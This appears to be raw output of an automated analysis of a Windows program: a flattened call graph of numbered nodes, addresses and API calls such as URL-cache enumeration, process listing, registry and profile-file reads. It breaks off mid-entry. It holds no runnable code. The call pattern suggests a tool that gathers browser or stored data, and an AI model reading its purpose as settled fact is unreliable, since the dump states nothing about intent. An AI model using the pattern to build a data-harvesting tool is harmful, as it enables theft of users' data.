37866->37867 37868 401107 wcsncat 37866->37868 37869 40a7be 37867->37869 37868->37866 37870 40a7d2 37869->37870 37870->37797 37870->37870 37871->37794 37875 409bfd memset wcscpy 37872->37875 37874 409cdb CreateFontIndirectW 37874->37864 37875->37874 37876->37804 37878 40aa14 37877->37878 37879 40aa0a free 37877->37879 37878->37812 37879->37878 37881 40a8eb 37880->37881 37882 40a8df wcslen 37880->37882 37883 40a906 free 37881->37883 37884 40a90f 37881->37884 37882->37881 37885 40a919 37883->37885 37886 4099f4 3 API calls 37884->37886 37887 40a932 37885->37887 37888 40a929 free 37885->37888 37886->37885 37889 4099f4 3 API calls 37887->37889 37890 40a93e memcpy 37888->37890 37891 40a93d 37889->37891 37890->37804 37891->37890 37893 409a41 37892->37893 37894 4099fb malloc 37892->37894 37893->37804 37896 409a37 37894->37896 37897 409a1c 37894->37897 37896->37804 37898 409a30 free 37897->37898 37899 409a20 memcpy 37897->37899 37898->37896 37899->37898 37901 40a9e7 37900->37901 37902 40a9dc free 37900->37902 37903 4099f4 3 API calls 37901->37903 37904 40a9f2 37902->37904 37903->37904 37904->37810 37929 409bca GetModuleFileNameW 37905->37929 37907 40dce6 wcsrchr 37908 40dcf5 37907->37908 37909 40dcf9 wcscat 37907->37909 37908->37909 37909->37818 37930 44db70 37910->37930 37914 40dbfd 37933 4447d9 37914->37933 37917 40dc34 wcscpy wcscpy 37959 40d6f5 37917->37959 37918 40dc1f wcscpy 37918->37917 37921 40d6f5 3 API calls 37922 40dc73 37921->37922 37923 40d6f5 3 API calls 37922->37923 37924 40dc89 37923->37924 37925 40d6f5 3 API calls 37924->37925 37926 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37925->37926 37965 40da80 37926->37965 37929->37907 37931 40dbb4 memset memset 37930->37931 37932 409bca GetModuleFileNameW 37931->37932 37932->37914 37935 4447f4 37933->37935 37934 40dc1b 37934->37917 37934->37918 37935->37934 37936 444807 ??2@YAPAXI 37935->37936 37937 44481f 37936->37937 37938 444873 _snwprintf 37937->37938 37939 4448ab wcscpy 37937->37939 37972 44474a 8 API calls 37938->37972 37941 4448bb 37939->37941 37973 44474a 8 API calls 37941->37973 37942 4448a7 37942->37939 37942->37941 37944 4448cd 37974 44474a 8 API calls 37944->37974 37946 4448e2 37975 44474a 8 API calls 37946->37975 37948 4448f7 37976 44474a 8 API calls 37948->37976 37950 44490c 37977 44474a 8 API calls 37950->37977 37952 444921 37978 44474a 8 API calls 37952->37978 37954 444936 37979 44474a 8 API calls 37954->37979 37956 44494b 37980 44474a 8 API calls 37956->37980 37958 444960 ??3@YAXPAX 37958->37934 37960 44db70 37959->37960 37961 40d702 memset GetPrivateProfileStringW 37960->37961 37962 40d752 37961->37962 37963 40d75c WritePrivateProfileStringW 37961->37963 37962->37963 37964 40d758 37962->37964 37963->37964 37964->37921 37966 44db70 37965->37966 37967 40da8d memset 37966->37967 37968 40daac LoadStringW 37967->37968 37969 40dac6 37968->37969 37969->37968 37971 40dade 37969->37971 37981 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37969->37981 37971->37751 37972->37942 37973->37944 37974->37946 37975->37948 37976->37950 37977->37952 37978->37954 37979->37956 37980->37958 37981->37969 37992 409b98 GetFileAttributesW 37982->37992 37984 40daea 37985 40db63 37984->37985 37986 40daef wcscpy wcscpy GetPrivateProfileIntW 37984->37986 37985->37753 37993 40d65d GetPrivateProfileStringW 37986->37993 37988 40db3e 37994 40d65d GetPrivateProfileStringW 37988->37994 37990 40db4f 37995 40d65d GetPrivateProfileStringW 37990->37995 37992->37984 37993->37988 37994->37990 37995->37985 38031 40eaff 37996->38031 38000 411ae2 memset 37999->38000 38001 411b8f 37999->38001 38072 409bca GetModuleFileNameW 38000->38072 38013 411a8b 38001->38013 38003 411b0a wcsrchr 38004 411b22 wcscat 38003->38004 38005 411b1f 38003->38005 38073 414770 wcscpy wcscpy wcscpy CloseHandle 38004->38073 38005->38004 38007 411b67 38074 402afb 38007->38074 38011 411b7f 38130 40ea13 SendMessageW memset SendMessageW 38011->38130 38014 402afb 27 API calls 38013->38014 38015 411ac0 38014->38015 38016 4110dc 38015->38016 38017 41113e 38016->38017 38022 4110f0 38016->38022 38155 40969c LoadCursorW SetCursor 38017->38155 38019 411143 38156 4032b4 38019->38156 38174 444a54 38019->38174 38020 4110f7 _wcsicmp 38020->38022 38021 411157 38023 40ada2 _wcsicmp 38021->38023 38022->38017 38022->38020 38177 410c46 10 API calls 38022->38177 38026 411167 38023->38026 38024 4111af 38026->38024 38027 4111a6 qsort 38026->38027 38027->38024 38030->37830 38032 40eb10 38031->38032 38045 40e8e0 38032->38045 38035 40eb6c memcpy memcpy 38036 40ebe1 38035->38036 38043 40ebb7 38035->38043 38036->38035 38038 40ebf2 ??2@YAPAXI ??2@YAPAXI 38036->38038 38037 40d134 16 API calls 38037->38043 38039 40ec2e ??2@YAPAXI 38038->38039 38041 40ec65 38038->38041 38039->38041 38041->38041 38055 40ea7f 38041->38055 38043->38036 38043->38037 38044 402f49 38044->37830 38046 40e8f2 38045->38046 38047 40e8eb ??3@YAXPAX 38045->38047 38048 40e900 38046->38048 38049 40e8f9 ??3@YAXPAX 38046->38049 38047->38046 38050 40e911 38048->38050 38051 40e90a ??3@YAXPAX 38048->38051 38049->38048 38052 40e931 ??2@YAPAXI ??2@YAPAXI 38050->38052 38053 40e921 ??3@YAXPAX 38050->38053 38054 40e92a ??3@YAXPAX 38050->38054 38051->38050 38052->38035 38053->38054 38054->38052 38056 40aa04 free 38055->38056 38057 40ea88 38056->38057 38058 40aa04 free 38057->38058 38059 40ea90 38058->38059 38060 40aa04 free 38059->38060 38061 40ea98 38060->38061 38062 40aa04 free 38061->38062 38063 40eaa0 38062->38063 38064 40a9ce 4 API calls 38063->38064 38065 40eab3 38064->38065 38066 40a9ce 4 API calls 38065->38066 38067 40eabd 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eac7 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40ead1 38070->38071 38071->38044 38072->38003 38073->38007 38131 40b2cc 38074->38131 38076 402b0a 38077 40b2cc 27 API calls 38076->38077 38078 402b23 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402b3a 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402b54 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b6b 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b82 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b99 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402bb0 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402bc7 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bde 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bf5 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402c0c 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402c23 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c3a 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c51 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c68 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c7f 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c99 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402cb3 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402cd5 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cf0 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402d0b 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402d26 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d3e 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d59 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d78 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d93 38127->38128 38129 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38128->38129 38129->38011 38130->38001 38134 40b58d 38131->38134 38133 40b2d1 38133->38076 38135 40b5a4 GetModuleHandleW FindResourceW 38134->38135 38136 40b62e 38134->38136 38137 40b5c2 LoadResource 38135->38137 38139 40b5e7 38135->38139 38136->38133 38138 40b5d0 SizeofResource LockResource 38137->38138 38137->38139 38138->38139 38139->38136 38147 40afcf 38139->38147 38141 40b608 memcpy 38150 40b4d3 memcpy 38141->38150 38143 40b61e 38151 40b3c1 18 API calls 38143->38151 38145 40b626 38152 40b04b 38145->38152 38148 40b04b ??3@YAXPAX 38147->38148 38149 40afd7 ??2@YAPAXI 38148->38149 38149->38141 38150->38143 38151->38145 38153 40b051 ??3@YAXPAX 38152->38153 38154 40b05f 38152->38154 38153->38154 38154->38136 38155->38019 38157 4032c4 38156->38157 38158 40b633 free 38157->38158 38159 403316 38158->38159 38178 44553b 38159->38178 38163 403480 38376 40368c 15 API calls 38163->38376 38165 403489 38166 40b633 free 38165->38166 38168 403495 38166->38168 38167 40333c 38167->38163 38169 4033a9 memset memcpy 38167->38169 38170 4033ec wcscmp 38167->38170 38374 4028e7 11 API calls 38167->38374 38375 40f508 6 API calls 38167->38375 38168->38021 38169->38167 38169->38170 38170->38167 38172 403421 _wcsicmp 38172->38167 38175 444a64 FreeLibrary 38174->38175 38176 444a83 38174->38176 38175->38176 38176->38021 38177->38022 38179 445548 38178->38179 38180 445599 38179->38180 38377 40c768 38179->38377 38181 4455a8 memset 38180->38181 38323 4457f2 38180->38323 38461 403988 38181->38461 38187 4455e5 38196 445672 38187->38196 38206 44560f 38187->38206 38189 4458bb memset memset 38193 414c2e 16 API calls 38189->38193 38191 4459ed 38197 445a00 memset memset 38191->38197 38198 445b22 38191->38198 38192 44595e memset memset 38199 414c2e 16 API calls 38192->38199 38200 4458f9 38193->38200 38194 44557a 38201 44558c 38194->38201 38441 4136c0 38194->38441 38472 403fbe memset memset memset memset memset 38196->38472 38203 414c2e 16 API calls 38197->38203 38208 445bca 38198->38208 38209 445b38 memset memset memset 38198->38209 38204 44599c 38199->38204 38205 40b2cc 27 API calls 38200->38205 38445 444b06 38201->38445 38213 445a3e 38203->38213 38215 40b2cc 27 API calls 38204->38215 38216 445909 38205->38216 38218 4087b3 335 API calls 38206->38218 38217 445c8b memset memset 38208->38217 38274 445cf0 38208->38274 38221 445bd4 38209->38221 38222 445b98 38209->38222 38210 445849 38655 40b1ab free free 38210->38655 38223 40b2cc 27 API calls 38213->38223 38231 4459ac 38215->38231 38227 409d1f 6 API calls 38216->38227 38232 414c2e 16 API calls 38217->38232 38228 445621 38218->38228 38220 44589f 38656 40b1ab free free 38220->38656 38610 414c2e 38221->38610 38222->38221 38234 445ba2 38222->38234 38236 445a4f 38223->38236 38226 403335 38373 4452e5 43 API calls 38226->38373 38242 445919 38227->38242 38641 4454bf 20 API calls 38228->38641 38229 445823 38229->38210 38251 4087b3 335 API calls 38229->38251 38230 445854 38237 4458aa 38230->38237 38587 403c9c memset memset memset memset memset 38230->38587 38243 409d1f 6 API calls 38231->38243 38244 445cc9 38232->38244 38746 4099c6 wcslen 38234->38746 38235 4456b2 38643 40b1ab free free 38235->38643 38248 409d1f 6 API calls 38236->38248 38237->38189 38270 44594a 38237->38270 38240 445d3d 38269 40b2cc 27 API calls 38240->38269 38241 445d88 memset memset memset 38252 414c2e 16 API calls 38241->38252 38657 409b98 GetFileAttributesW 38242->38657 38253 4459bc 38243->38253 38254 409d1f 6 API calls 38244->38254 38245 445879 38245->38220 38264 4087b3 335 API calls 38245->38264 38247 445680 38247->38235 38495 4087b3 memset 38247->38495 38257 445a63 38248->38257 38249 40b2cc 27 API calls 38258 445bf3 38249->38258 38251->38229 38261 445dde 38252->38261 38722 409b98 GetFileAttributesW 38253->38722 38263 445ce1 38254->38263 38255 445bb3 38749 445403 memset 38255->38749 38267 40b2cc 27 API calls 38257->38267 38626 409d1f wcslen wcslen 38258->38626 38259 445928 38259->38270 38658 40b6ef 38259->38658 38271 40b2cc 27 API calls 38261->38271 38766 409b98 GetFileAttributesW 38263->38766 38264->38245 38276 445a94 38267->38276 38279 445d54 _wcsicmp 38269->38279 38270->38191 38270->38192 38282 445def 38271->38282 38272 4459cb 38272->38191 38289 40b6ef 249 API calls 38272->38289 38274->38226 38274->38240 38274->38241 38275 445389 255 API calls 38275->38208 38723 40ae18 38276->38723 38277 44566d 38277->38323 38546 413d4c 38277->38546 38286 445d71 38279->38286 38350 445d67 38279->38350 38281 445665 38642 40b1ab free free 38281->38642 38287 409d1f 6 API calls 38282->38287 38767 445093 23 API calls 38286->38767 38294 445e03 38287->38294 38289->38191 38290 4456d8 38296 40b2cc 27 API calls 38290->38296 38293 44563c 38293->38281 38299 4087b3 335 API calls 38293->38299 38768 409b98 GetFileAttributesW 38294->38768 38295 40b6ef 249 API calls 38295->38226 38301 4456e2 38296->38301 38297 40b2cc 27 API calls 38302 445c23 38297->38302 38298 445d83 38298->38226 38299->38293 38644 413fa6 _wcsicmp _wcsicmp 38301->38644 38306 409d1f 6 API calls 38302->38306 38304 445e12 38310 445e6b 38304->38310 38317 40b2cc 27 API calls 38304->38317 38308 445c37 38306->38308 38307 4456eb 38313 4456fd memset memset memset memset 38307->38313 38314 4457ea 38307->38314 38315 445389 255 API calls 38308->38315 38309 445b17 38743 40aebe 38309->38743 38770 445093 23 API calls 38310->38770 38645 409c70 wcscpy wcsrchr 38313->38645 38648 413d29 38314->38648 38321 445c47 38315->38321 38322 445e33 38317->38322 38319 445e7e 38324 445f67 38319->38324 38327 40b2cc 27 API calls 38321->38327 38328 409d1f 6 API calls 38322->38328 38323->38230 38564 403e2d memset memset memset memset memset 38323->38564 38330 40b2cc 27 API calls 38324->38330 38325 445ab2 memset 38331 40b2cc 27 API calls 38325->38331 38333 445c53 38327->38333 38329 445e47 38328->38329 38769 409b98 GetFileAttributesW 38329->38769 38335 445f73 38330->38335 38336 445aa1 38331->38336 38332 409c70 2 API calls 38337 44577e 38332->38337 38338 409d1f 6 API calls 38333->38338 38340 409d1f 6 API calls 38335->38340 38336->38309 38336->38325 38341 409d1f 6 API calls 38336->38341 38349 445389 255 API calls 38336->38349 38730 40add4 38336->38730 38735 40ae51 38336->38735 38342 409c70 2 API calls 38337->38342 38343 445c67 38338->38343 38339 445e56 38339->38310 38347 445e83 memset 38339->38347 38344 445f87 38340->38344 38341->38336 38345 44578d 38342->38345 38346 445389 255 API calls 38343->38346 38773 409b98 GetFileAttributesW 38344->38773 38345->38314 38352 40b2cc 27 API calls 38345->38352 38346->38208 38351 40b2cc 27 API calls 38347->38351 38349->38336 38350->38226 38350->38295 38353 445eab 38351->38353 38354 4457a8 38352->38354 38355 409d1f 6 API calls 38353->38355 38356 409d1f 6 API calls 38354->38356 38357 445ebf 38355->38357 38358 4457b8 38356->38358 38359 40ae18 9 API calls 38357->38359 38647 409b98 GetFileAttributesW 38358->38647 38369 445ef5 38359->38369 38361 4457c7 38361->38314 38363 4087b3 335 API calls 38361->38363 38362 40ae51 9 API calls 38362->38369 38363->38314 38364 445f5c 38366 40aebe FindClose 38364->38366 38365 40add4 2 API calls 38365->38369 38366->38324 38367 40b2cc 27 API calls 38367->38369 38368 409d1f 6 API calls 38368->38369 38369->38362 38369->38364 38369->38365 38369->38367 38369->38368 38371 445f3a 38369->38371 38771 409b98 GetFileAttributesW 38369->38771 38772 445093 23 API calls 38371->38772 38373->38167 38374->38172 38375->38167 38376->38165 38378 40c775 38377->38378 38774 40b1ab free free 38378->38774 38380 40c788 38775 40b1ab free free 38380->38775 38382 40c790 38776 40b1ab free free 38382->38776 38384 40c798 38385 40aa04 free 38384->38385 38386 40c7a0 38385->38386 38777 40c274 memset 38386->38777 38391 40a8ab 9 API calls 38392 40c7c3 38391->38392 38393 40a8ab 9 API calls 38392->38393 38394 40c7d0 38393->38394 38806 40c3c3 38394->38806 38398 40c877 38407 40bdb0 38398->38407 38399 40c86c 38834 4053fe 37 API calls 38399->38834 38402 40c813 _wcslwr 38832 40c634 47 API calls 38402->38832 38404 40c829 wcslen 38405 40c7e5 38404->38405 38405->38398 38405->38399 38831 40a706 wcslen memcpy 38405->38831 38833 40c634 47 API calls 38405->38833 38968 404363 38407->38968 38409 40bf5d 38985 40440c 38409->38985 38413 40b2cc 27 API calls 38414 40be02 wcslen 38413->38414 38414->38409 38422 40be1e 38414->38422 38415 40be26 wcsncmp 38415->38422 38418 40be7d memset 38419 40bea7 memcpy 38418->38419 38418->38422 38420 40bf11 wcschr 38419->38420 38419->38422 38420->38422 38421 40b2cc 27 API calls 38423 40bef6 _wcsnicmp 38421->38423 38422->38409 38422->38415 38422->38418 38422->38419 38422->38420 38422->38421 38424 40bf43 LocalFree 38422->38424 38988 40bd5d 28 API calls 38422->38988 38989 404423 38422->38989 38423->38420 38423->38422 38424->38422 38425 4135f7 39001 4135e0 38425->39001 38428 40b2cc 27 API calls 38429 41360d 38428->38429 38430 40a804 8 API calls 38429->38430 38431 413613 38430->38431 38432 41363e 38431->38432 38434 40b273 27 API calls 38431->38434 38433 4135e0 FreeLibrary 38432->38433 38435 413643 38433->38435 38436 413625 38434->38436 38435->38194 38436->38432 38437 413648 38436->38437 38438 413658 38437->38438 38439 4135e0 FreeLibrary 38437->38439 38438->38194 38440 413666 38439->38440 38440->38194 38443 4136e2 38441->38443 38442 413827 38640 41366b FreeLibrary 38442->38640 38443->38442 38444 4137ac CoTaskMemFree 38443->38444 38444->38443 39004 4449b9 38445->39004 38448 444c1f 38448->38180 38449 4449b9 35 API calls 38451 444b4b 38449->38451 38450 444c15 38452 4449b9 35 API calls 38450->38452 38451->38450 39024 444972 GetVersionExW 38451->39024 38452->38448 38454 444b99 memcmp 38458 444b8c 38454->38458 38455 444c0b 39028 444a85 35 API calls 38455->39028 38458->38454 38458->38455 39025 444aa5 35 API calls 38458->39025 39026 40a7a0 GetVersionExW 38458->39026 39027 444a85 35 API calls 38458->39027 38462 40399d 38461->38462 39029 403a16 38462->39029 38464 403a09 39043 40b1ab free free 38464->39043 38466 4039a3 38466->38464 38470 4039f4 38466->38470 39040 40a02c CreateFileW 38466->39040 38467 403a12 wcsrchr 38467->38187 38470->38464 38471 4099c6 2 API calls 38470->38471 38471->38464 38473 414c2e 16 API calls 38472->38473 38474 404048 38473->38474 38475 414c2e 16 API calls 38474->38475 38476 404056 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 404073 38477->38478 38479 409d1f 6 API calls 38478->38479 38480 40408e 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 4040a6 38481->38482 38483 403af5 20 API calls 38482->38483 38484 4040ba 38483->38484 38485 403af5 20 API calls 38484->38485 38486 4040cb 38485->38486 39070 40414f memset 38486->39070 38488 404140 39084 40b1ab free free 38488->39084 38489 4040e0 38489->38488 38491 4040ec memset 38489->38491 38493 4099c6 2 API calls 38489->38493 38494 40a8ab 9 API calls 38489->38494 38491->38489 38492 404148 38492->38247 38493->38489 38494->38489 39097 40a6e6 WideCharToMultiByte 38495->39097 38497 4087ed 39098 4095d9 memset 38497->39098 38500 408809 memset memset memset memset memset 38501 40b2cc 27 API calls 38500->38501 38502 4088a1 38501->38502 38503 409d1f 6 API calls 38502->38503 38504 4088b1 38503->38504 38505 40b2cc 27 API calls 38504->38505 38506 4088c0 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088d0 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088df 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088ef 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088fe 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 40890e 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 40891d 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40892d 38519->38520 39115 409b98 GetFileAttributesW 38520->39115 38522 40893e 38523 408943 38522->38523 38524 408958 38522->38524 39116 407fdf 75 API calls 38523->39116 39117 409b98 GetFileAttributesW 38524->39117 38527 408964 38528 408969 38527->38528 38529 40897b 38527->38529 39118 4082c7 198 API calls 38528->39118 39119 409b98 GetFileAttributesW 38529->39119 38532 408953 38532->38247 38533 408987 38534 4089a1 38533->38534 38535 40898c 38533->38535 39121 409b98 GetFileAttributesW 38534->39121 39120 408560 29 API calls 38535->39120 38538 4089ad 38539 4089b2 38538->38539 38540 4089c7 38538->38540 39122 408560 29 API calls 38539->39122 39123 409b98 GetFileAttributesW 38540->39123 38543 4089d3 38543->38532 38544 4089d8 38543->38544 39124 408560 29 API calls 38544->39124 38547 40b633 free 38546->38547 38548 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38547->38548 38549 413f00 Process32NextW 38548->38549 38550 413da5 OpenProcess 38549->38550 38551 413f17 CloseHandle 38549->38551 38552 413df3 memset 38550->38552 38555 413eb0 38550->38555 38551->38290 39147 413f27 38552->39147 38554 413ebf free 38554->38555 38555->38549 38555->38554 38556 4099f4 3 API calls 38555->38556 38556->38555 38558 413e37 GetModuleHandleW 38559 413e46 38558->38559 38561 413e1f 38558->38561 38559->38561 38560 413e6a QueryFullProcessImageNameW 38560->38561 38561->38558 38561->38560 39152 413959 38561->39152 39168 413ca4 38561->39168 38563 413ea2 CloseHandle 38563->38555 38565 414c2e 16 API calls 38564->38565 38566 403eb7 38565->38566 38567 414c2e 16 API calls 38566->38567 38568 403ec5 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 403ee2 38569->38570 38571 409d1f 6 API calls 38570->38571 38572 403efd 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403f15 38573->38574 38575 403af5 20 API calls 38574->38575 38576 403f29 38575->38576 38577 403af5 20 API calls 38576->38577 38578 403f3a 38577->38578 38579 40414f 33 API calls 38578->38579 38580 403f4f 38579->38580 38581 403faf 38580->38581 38583 403f5b memset 38580->38583 38585 4099c6 2 API calls 38580->38585 38586 40a8ab 9 API calls 38580->38586 39181 40b1ab free free 38581->39181 38583->38580 38584 403fb7 38584->38229 38585->38580 38586->38580 38588 414c2e 16 API calls 38587->38588 38589 403d26 38588->38589 38590 414c2e 16 API calls 38589->38590 38591 403d34 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 403d51 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 403d6c 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d84 38596->38597 38598 403af5 20 API calls 38597->38598 38599 403d98 38598->38599 38600 403af5 20 API calls 38599->38600 38601 403da9 38600->38601 38602 40414f 33 API calls 38601->38602 38603 403dbe 38602->38603 38604 403e1e 38603->38604 38606 403dca memset 38603->38606 38608 4099c6 2 API calls 38603->38608 38609 40a8ab 9 API calls 38603->38609 39182 40b1ab free free 38604->39182 38606->38603 38607 403e26 38607->38245 38608->38603 38609->38603 38611 414b81 8 API calls 38610->38611 38612 414c40 38611->38612 38613 414c73 memset 38612->38613 39183 409cea 38612->39183 38614 414c94 38613->38614 39186 414592 RegOpenKeyExW 38614->39186 38617 414c64 SHGetSpecialFolderPathW 38619 414d0b 38617->38619 38619->38249 38620 414cc1 38621 414cf4 wcscpy 38620->38621 39187 414bb0 wcscpy 38620->39187 38621->38619 38623 414cd2 39188 4145ac RegQueryValueExW 38623->39188 38625 414ce9 RegCloseKey 38625->38621 38627 409d43 wcscpy 38626->38627 38629 409d62 38626->38629 38628 409719 2 API calls 38627->38628 38630 409d51 wcscat 38628->38630 38631 445389 38629->38631 38630->38629 38632 40ae18 9 API calls 38631->38632 38633 4453c4 38632->38633 38634 40ae51 9 API calls 38633->38634 38635 4453f3 38633->38635 38636 40add4 2 API calls 38633->38636 38639 445403 250 API calls 38633->38639 38634->38633 38637 40aebe FindClose 38635->38637 38636->38633 38638 4453fe 38637->38638 38638->38297 38639->38633 38640->38201 38641->38293 38642->38277 38643->38277 38644->38307 38646 409c89 38645->38646 38646->38332 38647->38361 38649 413d39 38648->38649 38650 413d2f FreeLibrary 38648->38650 38651 40b633 free 38649->38651 38650->38649 38652 413d42 38651->38652 38653 40b633 free 38652->38653 38654 413d4a 38653->38654 38654->38323 38655->38230 38656->38237 38657->38259 38659 44db70 38658->38659 38660 40b6fc memset 38659->38660 38661 409c70 2 API calls 38660->38661 38662 40b732 wcsrchr 38661->38662 38663 40b743 38662->38663 38664 40b746 memset 38662->38664 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40b76f 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40b783 38667->38668 39189 409b98 GetFileAttributesW 38668->39189 38670 40b792 38672 409c70 2 API calls 38670->38672 38684 40b7c2 38670->38684 38674 40b7a5 38672->38674 38677 40b2cc 27 API calls 38674->38677 38675 40b837 CloseHandle 38679 40b83e memset 38675->38679 38676 40b817 39273 409a45 GetTempPathW 38676->39273 38680 40b7b2 38677->38680 39223 40a6e6 WideCharToMultiByte 38679->39223 38681 409d1f 6 API calls 38680->38681 38681->38684 38682 40b827 38682->38679 39190 40bb98 38684->39190 38685 40b866 39224 444432 38685->39224 38688 40bad5 38691 40b04b ??3@YAXPAX 38688->38691 38689 40b273 27 API calls 38690 40b89a 38689->38690 39270 438552 38690->39270 38693 40baf3 38691->38693 38693->38270 38695 40bacd 39304 443d90 110 API calls 38695->39304 38698 40bac6 39303 424f26 122 API calls 38698->39303 38699 40b8bd memset 39294 425413 17 API calls 38699->39294 38702 425413 17 API calls 38720 40b8b8 38702->38720 38705 40a71b MultiByteToWideChar 38705->38720 38706 40a734 MultiByteToWideChar 38706->38720 38709 40b9b5 memcmp 38709->38720 38710 4099c6 2 API calls 38710->38720 38711 404423 37 API calls 38711->38720 38714 4251c4 136 API calls 38714->38720 38715 40bb3e memset memcpy 39305 40a734 MultiByteToWideChar 38715->39305 38717 40bb88 LocalFree 38717->38720 38720->38698 38720->38699 38720->38702 38720->38705 38720->38706 38720->38709 38720->38710 38720->38711 38720->38714 38720->38715 38721 40ba5f memcmp 38720->38721 39295 4253ef 16 API calls 38720->39295 39296 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38720->39296 39297 4253af 17 API calls 38720->39297 39298 4253cf 17 API calls 38720->39298 39299 447280 memset 38720->39299 39300 447960 memset memcpy memcpy memcpy 38720->39300 39301 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38720->39301 39302 447920 memcpy memcpy memcpy 38720->39302 38721->38720 38722->38272 38724 40aebe FindClose 38723->38724 38725 40ae21 38724->38725 38726 4099c6 2 API calls 38725->38726 38727 40ae35 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 40ae49 38728->38729 38729->38336 38731 40ade0 38730->38731 38732 40ae0f 38730->38732 38731->38732 38733 40ade7 wcscmp 38731->38733 38732->38336 38733->38732 38734 40adfe wcscmp 38733->38734 38734->38732 38736 40ae7b FindNextFileW 38735->38736 38737 40ae5c FindFirstFileW 38735->38737 38738 40ae94 38736->38738 38739 40ae8f 38736->38739 38737->38738 38741 40aeb6 38738->38741 38742 409d1f 6 API calls 38738->38742 38740 40aebe FindClose 38739->38740 38740->38738 38741->38336 38742->38741 38744 40aed1 38743->38744 38745 40aec7 FindClose 38743->38745 38744->38198 38745->38744 38747 4099d7 38746->38747 38748 4099da memcpy 38746->38748 38747->38748 38748->38255 38750 40b2cc 27 API calls 38749->38750 38751 44543f 38750->38751 38752 409d1f 6 API calls 38751->38752 38753 44544f 38752->38753 39663 409b98 GetFileAttributesW 38753->39663 38755 44545e 38756 445476 38755->38756 38757 40b6ef 249 API calls 38755->38757 38758 40b2cc 27 API calls 38756->38758 38757->38756 38759 445482 38758->38759 38760 409d1f 6 API calls 38759->38760 38761 445492 38760->38761 39664 409b98 GetFileAttributesW 38761->39664 38763 4454a1 38764 4454b9 38763->38764 38765 40b6ef 249 API calls 38763->38765 38764->38275 38765->38764 38766->38274 38767->38298 38768->38304 38769->38339 38770->38319 38771->38369 38772->38369 38773->38350 38774->38380 38775->38382 38776->38384 38778 414c2e 16 API calls 38777->38778 38779 40c2ae 38778->38779 38835 40c1d3 38779->38835 38784 40c3be 38801 40a8ab 38784->38801 38785 40afcf 2 API calls 38786 40c2fd FindFirstUrlCacheEntryW 38785->38786 38787 40c3b6 38786->38787 38788 40c31e wcschr 38786->38788 38789 40b04b ??3@YAXPAX 38787->38789 38790 40c331 38788->38790 38791 40c35e FindNextUrlCacheEntryW 38788->38791 38789->38784 38793 40a8ab 9 API calls 38790->38793 38791->38788 38792 40c373 GetLastError 38791->38792 38794 40c3ad FindCloseUrlCache 38792->38794 38795 40c37e 38792->38795 38796 40c33e wcschr 38793->38796 38794->38787 38798 40afcf 2 API calls 38795->38798 38796->38791 38797 40c34f 38796->38797 38799 40a8ab 9 API calls 38797->38799 38800 40c391 FindNextUrlCacheEntryW 38798->38800 38799->38791 38800->38788 38800->38794 38929 40a97a 38801->38929 38804 40a8cc 38804->38391 38805 40a8d0 7 API calls 38805->38804 38934 40b1ab free free 38806->38934 38808 40c3dd 38809 40b2cc 27 API calls 38808->38809 38810 40c3e7 38809->38810 38935 414592 RegOpenKeyExW 38810->38935 38812 40c3f4 38813 40c50e 38812->38813 38814 40c3ff 38812->38814 38828 405337 38813->38828 38815 40a9ce 4 API calls 38814->38815 38816 40c418 memset 38815->38816 38936 40aa1d 38816->38936 38819 40c471 38821 40c47a _wcsupr 38819->38821 38820 40c505 RegCloseKey 38820->38813 38822 40a8d0 7 API calls 38821->38822 38823 40c498 38822->38823 38824 40a8d0 7 API calls 38823->38824 38825 40c4ac memset 38824->38825 38826 40aa1d 38825->38826 38827 40c4e4 RegEnumValueW 38826->38827 38827->38820 38827->38821 38938 405220 38828->38938 38830 405340 38830->38405 38831->38402 38832->38404 38833->38405 38834->38398 38836 40ae18 9 API calls 38835->38836 38842 40c210 38836->38842 38837 40ae51 9 API calls 38837->38842 38838 40c264 38839 